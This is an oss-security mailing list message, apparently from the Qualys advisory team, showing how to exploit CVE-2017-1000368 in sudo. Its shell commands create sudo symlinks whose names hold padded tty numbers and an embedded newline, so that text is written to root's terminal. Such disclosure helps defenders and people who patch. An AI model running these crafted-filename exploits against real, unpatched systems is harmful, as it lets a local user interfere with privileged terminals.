Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <20170606223100.GD27224@localhost.localdomain>
Date: Tue, 6 Jun 2017 15:31:00 -0700
From: Qualys Security Advisory <qsa@...lys.com>
To: oss-security@...ts.openwall.com
Subject: Re: Arbitrary terminal access via sudo on Linux

On Fri, Jun 02, 2017 at 12:55:10PM -0600, Todd C. Miller wrote:
> However, the arbitrary tty access IS exploitable in 1.8.20p1.

For example, against Sudo < 1.8.20p1:

$ /usr/bin/sudo -l
...
User john may run the following commands on localhost:
    (nobody) /usr/bin/sum

$ ln -s /usr/bin/sudo '     1026 '
(1026 is tty2, currently used by root)

$ ./'     1026 ' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n'
(this is written to root's tty2)

Or, against Sudo = 1.8.20p1:

$ ln -s /usr/bin/sudo $')     1026 \n'
$ ./$')     1026 \n' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n'

CVE-2017-1000368 was assigned to this newline vulnerability:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000368

With best regards,

-- 
the Qualys Security Advisory team

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.